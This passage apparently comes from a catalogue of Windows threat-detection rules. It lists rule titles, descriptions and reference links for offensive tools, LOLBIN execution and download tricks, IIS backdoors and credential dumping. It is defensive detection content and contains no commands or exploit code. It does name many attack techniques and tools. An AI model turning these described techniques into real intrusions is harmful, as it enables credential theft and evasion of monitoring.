https://github.com/shantanu561993/SharpChisel, https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/ |
HackTool - SharpImpersonation Execution |
Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively |
https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/, https://github.com/S3cur3Th1sSh1t/SharpImpersonation |
HackTool - SharpDPAPI Execution |
Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.
SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
|
https://github.com/GhostPack/SharpDPAPI |
HackTool - SharpLDAPmonitor Execution |
Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects. |
https://github.com/p0dalirius/LDAPmonitor |
HackTool - SILENTTRINITY Stager Execution |
Detects SILENTTRINITY stager use via PE metadata |
https://github.com/byt3bl33d3r/SILENTTRINITY |
HackTool - Sliver C2 Implant Activity Pattern |
Detects process activity patterns as seen being used by Sliver C2 framework implants |
https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36, https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ |
HackTool - SOAPHound Execution |
Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
|
https://github.com/FalconForceTeam/SOAPHound, https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c |
HackTool - Stracciatella Execution |
Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics. |
https://github.com/mgeeky/Stracciatella |
HackTool - SysmonEOP Execution |
Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120 |
https://github.com/Wh04m1001/SysmonEoP |
HackTool - TruffleSnout Execution |
Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration. |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md, https://github.com/dsnezhkov/TruffleSnout, https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md |
HackTool - UACMe Akagi Execution |
Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata |
https://github.com/hfiref0x/UACME |
HackTool - Windows Credential Editor (WCE) Execution |
Detects the use of Windows Credential Editor (WCE) |
https://www.ampliasecurity.com/research/windows-credentials-editor/ |
HackTool - winPEAS Execution |
WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz |
https://github.com/carlospolop/PEASS-ng, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation |
HackTool - WinPwn Execution |
Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
|
https://github.com/S3cur3Th1sSh1t/WinPwn, https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841, https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/, https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md, https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team |
HackTool - Wmiexec Default Powershell Command |
Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script |
https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py |
HackTool - XORDump Execution |
Detects suspicious use of XORDump process memory dumping utility |
https://github.com/audibleblink/xordump |
Suspicious ZipExec Execution |
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. |
https://twitter.com/SBousseaden/status/1451237393017839616, https://github.com/Tylous/ZipExec |
Suspicious Execution of Hostname |
Use of hostname to get information |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/hostname |
Suspicious HWP Sub Processes |
Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation |
https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/, https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1, https://twitter.com/cyberwar_15/status/1187287262054076416, https://blog.alyac.co.kr/1901, https://en.wikipedia.org/wiki/Hangul_(word_processor) |
Potential Fake Instance Of Hxtsr.EXE Executed |
HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
|
Internal Research |
Use Icacls to Hide File to Everyone |
Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files |
https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/ |
File Download And Execution Via IEExec.EXE |
Detects execution of the IEExec utility to download and execute files |
https://lolbas-project.github.io/lolbas/Binaries/Ieexec/ |
Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location |
Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.
This behavior has been observed in-the-wild by different threat actors.
|
https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior |
Disable Windows IIS HTTP Logging |
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging |
Microsoft IIS Service Account Password Dumped |
Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords |
https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html, https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA, https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/ |
IIS Native-Code Module Command Line Installation |
Detects suspicious IIS native-code module installations via command line |
https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/, https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ |
Suspicious IIS URL GlobalRules Rewrite Via AppCmd |
Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. |
https://twitter.com/malmoeb/status/1616702107242971144, https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r |
Microsoft IIS Connection Strings Decryption |
Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. |
https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html |
Suspicious IIS Module Registration |
Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors |
https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ |
C# IL Code Compilation Via Ilasm.EXE |
Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL. |
https://lolbas-project.github.io/lolbas/Binaries/Ilasm/, https://www.echotrail.io/insights/search/ilasm.exe |
ImagingDevices Unusual Parent/Child Processes |
Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity |
https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
Arbitrary File Download Via IMEWDBLD.EXE |
Detects usage of "IMEWDBLD.exe" to download arbitrary files |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download, https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/ |
InfDefaultInstall.exe .inf Execution |
Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution, https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/ |
File Download Via InstallUtil.EXE |
Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
|
https://github.com/LOLBAS-Project/LOLBAS/pull/239 |
Suspicious Execution of InstallUtil Without Log |
Uses the .NET InstallUtil.exe application in order to execute image without log |
https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool |
Suspicious Shells Spawn by Java Utility Keytool |
Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) |
https://redcanary.com/blog/intelligence-insights-december-2021, https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html |
Suspicious Child Process Of Manage Engine ServiceDesk |
Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service |
https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/, https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py, https://blog.viettelcybersecurity.com/saml-show-stopper/ |
Java Running with Remote Debugging |
Detects a JAVA process running with remote debugging allowing more than just localhost to connect |
https://dzone.com/articles/remote-debugging-java-applications-with-jdwp |
Suspicious Processes Spawned by Java.EXE |
Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) |
https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/ |
Shell Process Spawned by Java.EXE |
Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) |
https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/ |
Suspicious SysAidServer Child |
Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) |
https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/ |
JScript Compiler Execution |
Detects the execution of the "jsc.exe" (JScript Compiler).
Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
|
https://lolbas-project.github.io/lolbas/Binaries/Jsc/, https://www.phpied.com/make-your-javascript-a-windows-exe/, https://twitter.com/DissectMalware/status/998797808907046913 |
Kavremover Dropped Binary LOLBIN Usage |
Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. |
https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea |
Windows Kernel Debugger Execution |
Detects execution of the Windows Kernel Debugger "kd.exe". |
Internal Research |
Computer Password Change Via Ksetup.EXE |
Detects password change for the computer's domain account or host principal via "ksetup.exe" |
https://twitter.com/Oddvarmoe/status/1641712700605513729, https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup |
Potentially Suspicious Child Process of KeyScrambler.exe |
Detects potentially suspicious child processes of KeyScrambler.exe |
https://twitter.com/DTCERT/status/1712785421845790799 |
Active Directory Structure Export Via Ldifde.EXE |
Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. |
https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit, https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11) |
Logged-On User Password Change Via Ksetup.EXE |
Detects password change for the logged-on user's via "ksetup.exe" |
https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup |
Import LDAP Data Interchange Format File Via Ldifde.EXE |
Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
|
https://twitter.com/0gtweet/status/1564968845726580736, https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11) |
Uncommon Link.EXE Parent Process |
Detects an uncommon parent process of "LINK.EXE".
Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.
Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity.
This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location.
By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
|
https://twitter.com/0gtweet/status/1560732860935729152 |
Rebuild Performance Counter Values Via Lodctr.EXE |
Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. |
https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr |
Suspicious Windows Trace ETW Session Tamper Via Logman.EXE |
Detects the execution of "logman" utility in order to disable or delete Windows trace sessions |
https://twitter.com/0gtweet/status/1359039665232306183?s=21, https://ss64.com/nt/logman.html |
Suspicious CustomShellHost Execution |
Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe' |
https://github.com/LOLBAS-Project/LOLBAS/pull/180, https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/ |
LOLBAS Data Exfiltration by DataSvcUtil.exe |
Detects when a user performs data exfiltration by using DataSvcUtil.exe |
https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services, https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/ |
Devtoolslauncher.exe Executes Specified Binary |
The Devtoolslauncher.exe executes other binary |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/, https://twitter.com/_felamos/status/1179811992841797632 |
DeviceCredentialDeployment Execution |
Detects the execution of DeviceCredentialDeployment to hide a process from view |
https://github.com/LOLBAS-Project/LOLBAS/pull/147 |
Suspicious Diantz Alternate Data Stream Execution |
Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file. |
https://lolbas-project.github.io/lolbas/Binaries/Diantz/ |
Suspicious Diantz Download and Compress Into a CAB File |
Download and compress a remote file and store it in a cab file on local machine. |
https://lolbas-project.github.io/lolbas/Binaries/Diantz/ |
Suspicious Extrac32 Execution |
Download or Copy file with Extrac32 |
https://lolbas-project.github.io/lolbas/Binaries/Extrac32/ |
Suspicious Extrac32 Alternate Data Stream Execution |
Extract data from cab file and hide it in an alternate data stream |
https://lolbas-project.github.io/lolbas/Binaries/Extrac32/ |
Potential Reconnaissance Activity Via GatherNetworkInfo.VBS |
Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine |
https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government |
Gpscript Execution |
Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy |
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/, https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ |
Ie4uinit Lolbin Use From Invalid Path |
Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories |
https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/, https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ |
Launch-VsDevShell.PS1 Proxy Execution |
Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. |
https://twitter.com/nas_bench/status/1535981653239255040 |
Potential Manage-bde.wsf Abuse To Proxy Execution |
Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution |
https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/, https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712, https://twitter.com/bohops/status/980659399495741441, https://twitter.com/JohnLaTwC/status/1223292479270600706, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md |
Mavinject Inject DLL Into Running Process |
Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md, https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e, https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152, https://github.com/SigmaHQ/sigma/issues/3742, https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection |
MpiExec Lolbin |
Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary |
https://twitter.com/mrd0x/status/1465058133303246867, https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps |
Execute Files with Msdeploy.exe |
Detects file execution using the msdeploy.exe lolbin |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/, https://twitter.com/pabraeken/status/995837734379032576, https://twitter.com/pabraeken/status/999090532839313408 |
Execute MSDT Via Answer File |
Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab) |
https://lolbas-project.github.io/lolbas/Binaries/Msdt/ |
Use of OpenConsole |
Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting |
https://twitter.com/nas_bench/status/1537563834478645252 |
OpenWith.exe Executes Specified Binary |
The OpenWith.exe executes other binary |
https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml, https://twitter.com/harr0ey/status/991670870384021504 |
Use of Pcalua For Execution |
Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. |
https://lolbas-project.github.io/lolbas/Binaries/Pcalua/, https://pentestlab.blog/2020/07/06/indirect-command-execution/ |
Indirect Command Execution By Program Compatibility Wizard |
Detect indirect command execution via Program Compatibility Assistant pcwrun.exe |
https://twitter.com/pabraeken/status/991335019833708544, https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/ |
Execute Pcwrun.EXE To Leverage Follina |
Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability |
https://twitter.com/nas_bench/status/1535663791362519040 |
Code Execution via Pcwutl.dll |
Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library. |
https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/, https://twitter.com/harr0ey/status/989617817849876488 |
Execute Code with Pester.bat as Parent |
Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) |
https://twitter.com/Oddvarmoe/status/993383596244258816, https://twitter.com/_st0pp3r_/status/1560072680887525378 |
Execute Code with Pester.bat |
Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) |
https://twitter.com/Oddvarmoe/status/993383596244258816, https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md |
PrintBrm ZIP Creation of Extraction |
Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. |
https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/ |
Pubprn.vbs Proxy Execution |
Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. |
https://lolbas-project.github.io/lolbas/Scripts/Pubprn/ |
DLL Execution via Rasautou.exe |
Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. |
https://lolbas-project.github.io/lolbas/Binaries/Rasautou/, https://github.com/fireeye/DueDLLigence, https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html |
REGISTER_APP.VBS Proxy Execution |
Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. |
https://twitter.com/sblmsrsn/status/1456613494783160325?s=20 |
Use of Remote.exe |
Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files. |
https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/ |
Replace.exe Usage |
Detects the use of Replace.exe which can be used to replace file with another file |
https://lolbas-project.github.io/lolbas/Binaries/Replace/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace |
Lolbin Runexehelper Use As Proxy |
Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs |
https://twitter.com/0gtweet/status/1206692239839289344, https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/ |
Suspicious Runscripthelper.exe |
Detects execution of powershell scripts via Runscripthelper.exe |
https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/ |
Use of Scriptrunner.exe |
The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting |
https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/ |
Using SettingSyncHost.exe as LOLBin |
Detects using SettingSyncHost.exe to run hijacked binary |
https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin |
Use Of The SFTP.EXE Binary As A LOLBIN |
Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag |
https://github.com/LOLBAS-Project/LOLBAS/pull/264 |
Suspicious Certreq Command to Download |
Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files |
https://lolbas-project.github.io/lolbas/Binaries/Certreq/ |
Suspicious Driver Install by pnputil.exe |
Detects when a possible suspicious driver is being installed via pnputil.exe lolbin |
https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax, https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html |
Suspicious GrpConv Execution |
Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors |
https://twitter.com/0gtweet/status/1526833181831200770 |
Dumping Process via Sqldumper.exe |
Detects process dump via legitimate sqldumper.exe binary |
https://twitter.com/countuponsec/status/910977826853068800, https://twitter.com/countuponsec/status/910969424215232518, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/ |
SyncAppvPublishingServer Execute Arbitrary PowerShell Code |
Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code |
Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md, https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
Potential DLL Injection Or Execution Using Tracker.exe |
Detects potential DLL injection and execution using "Tracker.exe" |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/ |
Use of TTDInject.exe |
Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe) |
https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/ |
Time Travel Debugging Utility Usage |
Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. |
https://lolbas-project.github.io/lolbas/Binaries/Tttracer/, https://twitter.com/mattifestation/status/1196390321783025666, https://twitter.com/oulusoyum/status/1191329746069655553 |
Lolbin Unregmp2.exe Use As Proxy |
Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe" |
https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/ |
UtilityFunctions.ps1 Proxy Dll |
Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. |
https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/ |
Use of VisualUiaVerifyNative.exe |
VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules. |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac, https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/, https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad |
Visual Basic Command Line Compiler Usage |
Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. |
https://lolbas-project.github.io/lolbas/Binaries/Vbc/ |
Use of VSIISExeLauncher.exe |
The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/ |
Use of Wfc.exe |
The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules. |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac |
Potential Register_App.Vbs LOLScript Abuse |
Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution. |
https://twitter.com/sblmsrsn/status/1456613494783160325?s=20, https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs |
Potential Credential Dumping Via LSASS Process Clone |
Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity |
https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/, https://twitter.com/Hexacorn/status/1420053502554951689, https://twitter.com/SBousseaden/status/1464566846594691073?s=20 |
Potential Mftrace.EXE Abuse |
Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/ |
MMC20 Lateral Movement |
Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe |
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/, https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing |
MMC Spawning Windows Shell |
Detects a Windows command line executable started from MMC |
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ |
CodePage Modification Via MODE.COM To Russian Language |
Detects a CodePage modification using the "mode.com" utility to Russian language.
This behavior has been used by threat actors behind Dharma ransomware.
|
https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode, https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html, https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior |
Potential Suspicious Mofcomp Execution |
Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
Attackers abuse this utility to install malicious MOF scripts
|
https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/, https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml, https://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp |
Potential Mpclient.DLL Sideloading Via Defender Binaries |
